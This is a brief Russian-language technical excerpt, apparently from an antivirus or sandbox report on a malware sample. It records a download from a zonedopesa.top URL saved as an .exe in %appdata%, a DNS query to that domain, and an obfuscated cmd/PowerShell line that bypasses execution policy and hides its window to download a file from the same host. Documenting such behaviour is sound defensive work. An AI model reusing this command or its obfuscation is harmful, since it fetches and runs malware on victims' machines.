Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^owE^R^SHELL^.e^X^E^ ^-EXEcuti^o^NP^o^lI^Cy By^PAss^ -^noProFiLe -^w^I^n^D^Owst^YLe ^HIdden^ ^(nEW-OB^je^CT^ ^sySteM^.^nET^.w^EB^c^L^iEnt)^.^dOwnloADF^iLe('http://www.zonedop...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "P^owE^R^SHELL^.e^X^E^ ^-EXEcuti^o^NP^o^lI^Cy By^PAss^ -^noProFiLe -^w^I^n^D^Owst^YLe ^HIdden^ ^(nEW-OB^je^CT^ ^sySteM^.^nET^.w^EB^c^L^iEnt)^.^dOwnloADF^iLe('http://www.zonedop...' (со скрытым окном)